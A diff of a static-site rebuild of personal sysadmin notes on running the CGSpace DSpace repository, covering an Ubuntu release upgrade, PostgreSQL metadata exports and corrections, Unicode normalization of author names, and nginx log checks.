<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -46,7 +46,7 @@ Make sure all packages are up to date and the package manager is up to date, the
# dpkg -C
# reboot
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -76,12 +76,12 @@ Make sure all packages are up to date and the package manager is up to date, the
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -127,7 +127,7 @@ Make sure all packages are up to date and the package manager is up to date, the
<p class="blog-post-meta">
<time datetime="2019-12-01T11:22:30+02:00">Sun Dec 01, 2019</time>
in
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
</p>
@ -142,33 +142,33 @@ Make sure all packages are up to date and the package manager is up to date, the
</ul>
</li>
</ul>
<pre><code># apt update &amp;&amp; apt full-upgrade
<pre tabindex="0"><code># apt update &amp;&amp; apt full-upgrade
# apt-get autoremove &amp;&amp; apt-get autoclean
# dpkg -C
# reboot
</code></pre><ul>
<li>Take some backups:</li>
</ul>
<pre><code># dpkg -l &gt; 2019-12-01-linode18-dpkg.txt
<pre tabindex="0"><code># dpkg -l &gt; 2019-12-01-linode18-dpkg.txt
# tar czf 2019-12-01-linode18-etc.tar.gz /etc
</code></pre><ul>
<li>Then check all third-party repositories in /etc/apt to see if everything using &ldquo;xenial&rdquo; has packages available for &ldquo;bionic&rdquo; and then update the sources:</li>
<li><!-- raw HTML omitted --># sed -i &rsquo;s/xenial/bionic/' /etc/apt/sources.list.d/*.list<!-- raw HTML omitted --></li>
<li><!-- raw HTML omitted --># sed -i &rsquo;s/xenial/bionic/&rsquo; /etc/apt/sources.list.d/*.list<!-- raw HTML omitted --></li>
<li>Pause the Uptime Robot monitoring for CGSpace</li>
<li>Make sure the update manager is installed and do the upgrade:</li>
</ul>
<pre><code># apt install update-manager-core
<pre tabindex="0"><code># apt install update-manager-core
# do-release-upgrade
</code></pre><ul>
<li>After the upgrade finishes, remove Java 11, force the installation of bionic nginx, and reboot the server:</li>
</ul>
<pre><code># apt purge openjdk-11-jre-headless
# apt install 'nginx=1.16.1-1~bionic'
<pre tabindex="0"><code># apt purge openjdk-11-jre-headless
# apt install &#39;nginx=1.16.1-1~bionic&#39;
# reboot
</code></pre><ul>
<li>After the server comes back up, remove Python virtualenvs that were created with Python 3.5 and re-run certbot to make sure it&rsquo;s working:</li>
</ul>
<pre><code># rm -rf /opt/eff.org/certbot/venv/bin/letsencrypt
<pre tabindex="0"><code># rm -rf /opt/eff.org/certbot/venv/bin/letsencrypt
# rm -rf /opt/ilri/dspace-statistics-api/venv
# /opt/certbot-auto
</code></pre><ul>
@ -195,8 +195,8 @@ Make sure all packages are up to date and the package manager is up to date, the
</ul>
</li>
</ul>
<pre><code>$ http 'https://cgspace.cgiar.org/oai/request?verb=GetRecord&amp;metadataPrefix=oai_dc&amp;identifier=oai:cgspace.cgiar.org:10568/104030' &gt; /tmp/cgspace-104030.xml
$ http 'https://dspacetest.cgiar.org/oai/request?verb=GetRecord&amp;metadataPrefix=oai_dc&amp;identifier=oai:cgspace.cgiar.org:10568/104030' &gt; /tmp/dspacetest-104030.xml
<pre tabindex="0"><code>$ http &#39;https://cgspace.cgiar.org/oai/request?verb=GetRecord&amp;metadataPrefix=oai_dc&amp;identifier=oai:cgspace.cgiar.org:10568/104030&#39; &gt; /tmp/cgspace-104030.xml
$ http &#39;https://dspacetest.cgiar.org/oai/request?verb=GetRecord&amp;metadataPrefix=oai_dc&amp;identifier=oai:cgspace.cgiar.org:10568/104030&#39; &gt; /tmp/dspacetest-104030.xml
</code></pre><ul>
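<li>To compare the two I can just pretty-print and diff them (a quick sketch using the files fetched above):</li>
</ul>
<pre tabindex="0"><code>$ xmllint --format /tmp/cgspace-104030.xml &gt; /tmp/cgspace-104030-pretty.xml
$ xmllint --format /tmp/dspacetest-104030.xml &gt; /tmp/dspacetest-104030-pretty.xml
$ diff /tmp/cgspace-104030-pretty.xml /tmp/dspacetest-104030-pretty.xml
</code></pre><ul>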
<li>The DSpace Test ones actually now capture the DOI, where the CGSpace doesn&rsquo;t&hellip;</li>
<li>And the DSpace Test one doesn&rsquo;t include review status as <code>dc.description</code>, but I don&rsquo;t think that&rsquo;s an important field</li>
@ -209,11 +209,11 @@ $ http 'https://dspacetest.cgiar.org/oai/request?verb=GetRecord&amp;metadataPref
</ul>
</li>
</ul>
<pre><code>dspace=# \COPY (SELECT handle, owning_collection FROM item, handle WHERE item.discoverable='f' AND item.in_archive='t' AND handle.resource_id = item.item_id) to /tmp/2019-12-04-CGSpace-private-items.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT handle, owning_collection FROM item, handle WHERE item.discoverable=&#39;f&#39; AND item.in_archive=&#39;t&#39; AND handle.resource_id = item.item_id) to /tmp/2019-12-04-CGSpace-private-items.csv WITH CSV HEADER;
COPY 48
</code></pre><h2 id="2019-12-05">2019-12-05</h2>
<ul>
<li>Give <a href="https://hdl.handle.net/10568/106045">presentation about CG Core v2</a> to the MEL Developers' Retreat in Nairobi, Kenya (via Skype)</li>
<li>Give <a href="https://hdl.handle.net/10568/106045">presentation about CG Core v2</a> to the MEL Developers&rsquo; Retreat in Nairobi, Kenya (via Skype)</li>
<li>Send some pull requests to the cg-core schema repository:
<ul>
<li><a href="https://github.com/AgriculturalSemantics/cg-core/pull/16">HTML syntax fixes</a></li>
@ -288,14 +288,14 @@ COPY 48
<li>I looked into creating RTF documents from HTML in Node.js and there is a library called <a href="https://www.npmjs.com/package/html-to-rtf">html-to-rtf</a> that works well, but doesn&rsquo;t support images</li>
<li>Export a list of all investors (<code>dc.description.sponsorship</code>) for Peter to look through and correct:</li>
</ul>
<pre><code>dspace=# \COPY (SELECT DISTINCT text_value as &quot;dc.contributor.sponsor&quot;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 29 GROUP BY text_value ORDER BY count DESC LIMIT 1500) to /tmp/2019-12-17-investors.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &#34;dc.contributor.sponsor&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 29 GROUP BY text_value ORDER BY count DESC LIMIT 1500) to /tmp/2019-12-17-investors.csv WITH CSV HEADER;
COPY 643
</code></pre><h2 id="2019-12-18">2019-12-18</h2>
<ul>
<li>Apply the investor corrections and deletions from Peter on CGSpace:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i /tmp/2019-12-17-investors-fix-112.csv -db dspace -u dspace -p 'fuuu' -f dc.description.sponsorship -m 29 -t correct -d
$ ./delete-metadata-values.py -i /tmp/2019-12-17-investors-delete-68.csv -db dspace -u dspace -p 'fuuu' -m 29 -f dc.description.sponsorship -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-12-17-investors-fix-112.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.description.sponsorship -m 29 -t correct -d
$ ./delete-metadata-values.py -i /tmp/2019-12-17-investors-delete-68.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 29 -f dc.description.sponsorship -d
</code></pre><ul>
<li>Peter asked about the &ldquo;Open Government Licence 3.0&rdquo; that is used by <a href="">some items</a>
<ul>
@ -304,13 +304,13 @@ $ ./delete-metadata-values.py -i /tmp/2019-12-17-investors-delete-68.csv -db dsp
</ul>
</li>
</ul>
<pre><code>dspace=# SELECT text_value FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%Open%';
<pre tabindex="0"><code>dspace=# SELECT text_value FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE &#39;%Open%&#39;;
text_value
-----------------------------
Open Government License 3.0
Open Government License 3.0
(2 rows)
dspace=# UPDATE metadatavalue SET text_value='OGL-UK-3.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%Open Government License 3.0%';
dspace=# UPDATE metadatavalue SET text_value=&#39;OGL-UK-3.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE &#39;%Open Government License 3.0%&#39;;
UPDATE 2
</code></pre><ul>
<li>I created a pull request to add the license and merged it to the <code>5_x-prod</code> branch (<a href="https://github.com/ilri/DSpace/pull/440">#440</a>)</li>
@ -321,7 +321,7 @@ UPDATE 2
</ul>
</li>
</ul>
<pre><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -c MegaIndex.ru
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -c MegaIndex.ru
27320
</code></pre><ul>
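<li>Using the same trick as with Amazonbot above, I can see which kinds of pages they are requesting (a quick sketch):</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep MegaIndex.ru | grep -o -E &#34;GET /(bitstream|discover|handle)&#34; | sort | uniq -c
</code></pre><ul>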
<li>I see they <em>did</em> check <code>robots.txt</code> and their requests are only going to XMLUI item pages&hellip; so I guess I just leave them alone</li>
@ -338,12 +338,12 @@ UPDATE 2
<ul>
<li>I ran the <code>dspace cleanup</code> process on CGSpace (linode18) and had an error:</li>
</ul>
<pre><code>Error: ERROR: update or delete on table &quot;bitstream&quot; violates foreign key constraint &quot;bundle_primary_bitstream_id_fkey&quot; on table &quot;bundle&quot;
Detail: Key (bitstream_id)=(179441) is still referenced from table &quot;bundle&quot;.
<pre tabindex="0"><code>Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
Detail: Key (bitstream_id)=(179441) is still referenced from table &#34;bundle&#34;.
</code></pre><ul>
<li>The solution is to delete that bitstream manually:</li>
</ul>
<pre><code>$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (179441);'
<pre tabindex="0"><code>$ psql dspace -c &#39;update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (179441);&#39;
UPDATE 1
</code></pre><ul>
<li>Adjust <a href="/cgspace-notes/cgspace-cgcorev2-migration/">CG Core v2 migration notes</a> to use <code>cg.review-status</code> instead of <code>cg.peer-reviewed</code>
@ -404,15 +404,15 @@ UPDATE 1
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -30,7 +30,7 @@ I tweeted the CGSpace repository link
<meta property="og:type" content="article" />
<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2020-01/" />
<meta property="article:published_time" content="2020-01-06T10:48:30+02:00" />
<meta property="article:modified_time" content="2020-03-12T12:58:21+02:00" />
<meta property="article:modified_time" content="2021-09-20T15:47:34+03:00" />
@ -56,7 +56,7 @@ I tweeted the CGSpace repository link
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -68,7 +68,7 @@ I tweeted the CGSpace repository link
"url": "https://alanorth.github.io/cgspace-notes/2020-01/",
"wordCount": "3523",
"datePublished": "2020-01-06T10:48:30+02:00",
"dateModified": "2020-03-12T12:58:21+02:00",
"dateModified": "2021-09-20T15:47:34+03:00",
"author": {
"@type": "Person",
"name": "Alan Orth"
@ -86,12 +86,12 @@ I tweeted the CGSpace repository link
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -137,7 +137,7 @@ I tweeted the CGSpace repository link
<p class="blog-post-meta">
<time datetime="2020-01-06T10:48:30+02:00">Mon Jan 06, 2020</time>
in
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
</p>
@ -148,7 +148,7 @@ I tweeted the CGSpace repository link
<li>Last week Altmetric responded about the <a href="https://hdl.handle.net/10568/97087">item</a> that had a lower score than its DOI
<ul>
<li>The score is now linked to the DOI</li>
<li>Another <a href="https://handle.hdl.net/10568/91278">item</a> that had the same problem in 2019 has now also linked to the score for its DOI</li>
<li>Another <a href="https://hdl.handle.net/10568/91278">item</a> that had the same problem in 2019 has now also linked to the score for its DOI</li>
<li>Another <a href="https://hdl.handle.net/10568/81236">item</a> that had the same problem in 2019 has also been fixed</li>
</ul>
</li>
@ -166,20 +166,20 @@ I tweeted the CGSpace repository link
<ul>
<li>Export a list of authors from CGSpace for Peter Ballantyne to look through and correct:</li>
</ul>
<pre><code>dspace=# \COPY (SELECT DISTINCT text_value as &quot;dc.contributor.author&quot;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 3 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-08-authors.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &#34;dc.contributor.author&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 3 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-08-authors.csv WITH CSV HEADER;
COPY 68790
</code></pre><ul>
<li>As I always have encoding issues with files Peter sends, I tried to convert it to some Windows encoding, but got an error:</li>
</ul>
<pre><code>$ iconv -f utf-8 -t windows-1252 /tmp/2020-01-08-authors.csv -o /tmp/2020-01-08-authors-windows.csv
<pre tabindex="0"><code>$ iconv -f utf-8 -t windows-1252 /tmp/2020-01-08-authors.csv -o /tmp/2020-01-08-authors-windows.csv
iconv: illegal input sequence at position 104779
</code></pre><ul>
<li>According to <a href="https://www.datafix.com.au/BASHing/2018-09-13.html">this trick</a> the troublesome character is on line 5227:</li>
</ul>
<pre><code>$ awk 'END {print NR&quot;: &quot;$0}' /tmp/2020-01-08-authors-windows.csv
5227: &quot;Oue
$ sed -n '5227p' /tmp/2020-01-08-authors.csv | xxd -c1
00000000: 22 &quot;
<pre tabindex="0"><code>$ awk &#39;END {print NR&#34;: &#34;$0}&#39; /tmp/2020-01-08-authors-windows.csv
5227: &#34;Oue
$ sed -n &#39;5227p&#39; /tmp/2020-01-08-authors.csv | xxd -c1
00000000: 22 &#34;
00000001: 4f O
00000002: 75 u
00000003: 65 e
@ -190,7 +190,7 @@ $ sed -n '5227p' /tmp/2020-01-08-authors.csv | xxd -c1
</code></pre><ul>
<li><del>According to the blog post linked above the troublesome character is probably the &ldquo;High Octet Preset&rdquo; (81)</del>, which vim identifies (using <code>ga</code> on the character) as:</li>
</ul>
<pre><code>&lt;e&gt; 101, Hex 65, Octal 145 &lt; ́&gt; 769, Hex 0301, Octal 1401
<pre tabindex="0"><code>&lt;e&gt; 101, Hex 65, Octal 145 &lt; ́&gt; 769, Hex 0301, Octal 1401
</code></pre><ul>
<li>If I understand the situation correctly it sounds like this means that the character is not actually encoded as UTF-8, so it&rsquo;s stored incorrectly in the database&hellip;</li>
<li>Other encodings like <code>windows-1251</code> and <code>windows-1257</code> also fail on different characters like &ldquo;ž&rdquo; and &ldquo;é&rdquo; that <em>are</em> legitimate UTF-8 characters</li>
@ -207,7 +207,7 @@ $ sed -n '5227p' /tmp/2020-01-08-authors.csv | xxd -c1
</ul>
</li>
</ul>
<pre><code>Exception: Read timed out
<pre tabindex="0"><code>Exception: Read timed out
java.net.SocketTimeoutException: Read timed out
</code></pre><ul>
<li>I am not sure how I will fix that shard&hellip;</li>
@ -225,30 +225,30 @@ java.net.SocketTimeoutException: Read timed out
</ul>
</li>
</ul>
<pre><code>In [7]: unicodedata.is_normalized('NFC', 'é')
<pre tabindex="0"><code>In [7]: unicodedata.is_normalized(&#39;NFC&#39;, &#39;é&#39;)
Out[7]: False
In [8]: unicodedata.is_normalized('NFC', 'é')
In [8]: unicodedata.is_normalized(&#39;NFC&#39;, &#39;é&#39;)
Out[8]: True
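# added illustration (not part of the original session): the decomposed form is
# two code points, while the NFC-normalized form is a single code point
In [9]: len(&#39;e\u0301&#39;), len(unicodedata.normalize(&#39;NFC&#39;, &#39;e\u0301&#39;))
Out[9]: (2, 1)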
</code></pre><h2 id="2020-01-15">2020-01-15</h2>
<ul>
<li>I added support for Unicode normalization to my <a href="https://github.com/ilri/csv-metadata-quality">csv-metadata-quality</a> tool in <a href="https://github.com/ilri/csv-metadata-quality/releases/tag/v0.4.0">v0.4.0</a></li>
<li>Generate ILRI and Bioversity subject lists for Elizabeth Arnaud from Bioversity:</li>
</ul>
<pre><code>dspace=# \COPY (SELECT DISTINCT text_value as &quot;cg.subject.ilri&quot;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 203 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-15-ilri-subjects.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &#34;cg.subject.ilri&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 203 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-15-ilri-subjects.csv WITH CSV HEADER;
COPY 144
dspace=# \COPY (SELECT DISTINCT text_value as &quot;cg.subject.bioversity&quot;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 120 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-15-bioversity-subjects.csv WITH CSV HEADER;
dspace=# \COPY (SELECT DISTINCT text_value as &#34;cg.subject.bioversity&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 120 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-15-bioversity-subjects.csv WITH CSV HEADER;
COPY 1325
</code></pre><ul>
<li>She will be meeting with FAO and will look over the terms to see if they can add some to AGROVOC</li>
<li>I noticed a few errors in the ILRI subjects so I fixed them locally and on CGSpace (linode18) using my <code>fix-metadata-values.py</code> script:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i 2020-01-15-fix-8-ilri-subjects.csv -db dspace -u dspace -p 'fuuu' -f cg.subject.ilri -m 203 -t correct -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2020-01-15-fix-8-ilri-subjects.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.subject.ilri -m 203 -t correct -d
</code></pre><h2 id="2020-01-16">2020-01-16</h2>
<ul>
<li>Extract a list of CIAT subjects from CGSpace for Elizabeth Arnaud from Bioversity:</li>
</ul>
<pre><code>dspace=# \COPY (SELECT DISTINCT text_value as &quot;cg.subject.ciat&quot;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 122 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-16-ciat-subjects.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &#34;cg.subject.ciat&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 122 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-16-ciat-subjects.csv WITH CSV HEADER;
COPY 35
</code></pre><ul>
<li>Start examining the 175 IITA records that Bosede originally sent in October, 2019 (201907.xls)
@ -301,7 +301,7 @@ COPY 35
<ul>
<li>I tried to create a MaxMind account so I can download the GeoLite2-City database with a license key, but their server refuses to accept me:</li>
</ul>
<pre><code>Sorry, we were not able to create your account. Please ensure that you are using an email that is not disposable, and that you are not connecting via a proxy or VPN.
<pre tabindex="0"><code>Sorry, we were not able to create your account. Please ensure that you are using an email that is not disposable, and that you are not connecting via a proxy or VPN.
</code></pre><ul>
<li>They started <a href="https://blog.maxmind.com/2019/12/18/significant-changes-to-accessing-and-using-geolite2-databases/">limiting public access to the database in December, 2019 due to GDPR and CCPA</a>
<ul>
@ -315,15 +315,15 @@ COPY 35
</ul>
</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i /tmp/2020-01-08-fix-2302-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -m 3 -t correct -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2020-01-08-fix-2302-authors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -m 3 -t correct -d
</code></pre><ul>
<li>Then I decided to export them again (with two author columns) so I can perform the new Unicode normalization mode I added to <a href="https://github.com/ilri/csv-metadata-quality">csv-metadata-quality</a>:</li>
</ul>
<pre><code>dspace=# \COPY (SELECT DISTINCT text_value as &quot;dc.contributor.author&quot;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 3 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-22-authors.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &#34;dc.contributor.author&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 3 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-22-authors.csv WITH CSV HEADER;
COPY 67314
dspace=# \q
$ csv-metadata-quality -i /tmp/2020-01-22-authors.csv -o /tmp/authors-normalized.csv -u --exclude-fields 'dc.date.issued,dc.date.issued[],dc.contributor.author'
$ ./fix-metadata-values.py -i /tmp/authors-normalized.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -m 3 -t correct
$ csv-metadata-quality -i /tmp/2020-01-22-authors.csv -o /tmp/authors-normalized.csv -u --exclude-fields &#39;dc.date.issued,dc.date.issued[],dc.contributor.author&#39;
$ ./fix-metadata-values.py -i /tmp/authors-normalized.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -m 3 -t correct
</code></pre><ul>
<li>Peter asked me to send him a list of affiliations to correct
<ul>
@ -331,19 +331,19 @@ $ ./fix-metadata-values.py -i /tmp/authors-normalized.csv -db dspace -u dspace -
</ul>
</li>
</ul>
<pre><code>dspace=# \COPY (SELECT DISTINCT text_value as &quot;cg.contributor.affiliation&quot;, text_value as &quot;correct&quot;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-22-affiliations.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, text_value as &#34;correct&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-22-affiliations.csv WITH CSV HEADER;
COPY 6170
dspace=# \q
$ csv-metadata-quality -i /tmp/2020-01-22-affiliations.csv -o /tmp/affiliations-normalized.csv -u --exclude-fields 'dc.date.issued,dc.date.issued[],cg.contributor.affiliation'
$ ./fix-metadata-values.py -i /tmp/affiliations-normalized.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211 -t correct -n
$ csv-metadata-quality -i /tmp/2020-01-22-affiliations.csv -o /tmp/affiliations-normalized.csv -u --exclude-fields &#39;dc.date.issued,dc.date.issued[],cg.contributor.affiliation&#39;
$ ./fix-metadata-values.py -i /tmp/affiliations-normalized.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.contributor.affiliation -m 211 -t correct -n
</code></pre><ul>
<li>I applied the corrections on DSpace Test and CGSpace, and then scheduled a full Discovery reindex for later tonight:</li>
</ul>
<pre><code>$ sleep 4h &amp;&amp; time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
<pre tabindex="0"><code>$ sleep 4h &amp;&amp; time schedtool -D -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
</code></pre><ul>
<li>Then I generated a new list for Peter:</li>
</ul>
<pre><code>dspace=# \COPY (SELECT DISTINCT text_value as &quot;cg.contributor.affiliation&quot;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-22-affiliations.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-22-affiliations.csv WITH CSV HEADER;
COPY 6162
</code></pre><ul>
<li>Abenet said she noticed that she gets different results on AReS and Atmire Listing and Reports, for example with author &ldquo;Hung, Nguyen&rdquo;
@ -352,8 +352,8 @@ COPY 6162
</ul>
</li>
</ul>
<pre><code>$ in2csv AReS-1-801dd394-54b5-436c-ad09-4f2e25f7e62e.xlsx | sed -E 's/10568 ([0-9]+)/10568\/\1/' | csvcut -c Handle | grep -v Handle | sort -u &gt; hung-nguyen-ares-handles.txt
$ grep -oE '10568\/[0-9]+' hung-nguyen-atmire.txt | sort -u &gt; hung-nguyen-atmire-handles.txt
<pre tabindex="0"><code>$ in2csv AReS-1-801dd394-54b5-436c-ad09-4f2e25f7e62e.xlsx | sed -E &#39;s/10568 ([0-9]+)/10568\/\1/&#39; | csvcut -c Handle | grep -v Handle | sort -u &gt; hung-nguyen-ares-handles.txt
$ grep -oE &#39;10568\/[0-9]+&#39; hung-nguyen-atmire.txt | sort -u &gt; hung-nguyen-atmire-handles.txt
$ wc -l hung-nguyen-a*handles.txt
46 hung-nguyen-ares-handles.txt
56 hung-nguyen-atmire-handles.txt
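# sketch: both files are already sorted, so comm shows the handles that only
# appear in the Atmire list (i.e. missing from AReS)
$ comm -13 hung-nguyen-ares-handles.txt hung-nguyen-atmire-handles.txt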
@ -374,7 +374,7 @@ $ wc -l hung-nguyen-a*handles.txt
</ul>
</li>
</ul>
<pre><code># cat /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;23/Jan/2020:0[12345678]&quot; | goaccess --log-format=COMBINED -
<pre tabindex="0"><code># cat /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;23/Jan/2020:0[12345678]&#34; | goaccess --log-format=COMBINED -
</code></pre><ul>
<li>The top two hosts according to the amount of data transferred are:
<ul>
@ -388,12 +388,12 @@ $ wc -l hung-nguyen-a*handles.txt
<li>They are apparently using this Drupal module to generate the thumbnails: <code>sites/all/modules/contrib/pdf_to_imagefield</code></li>
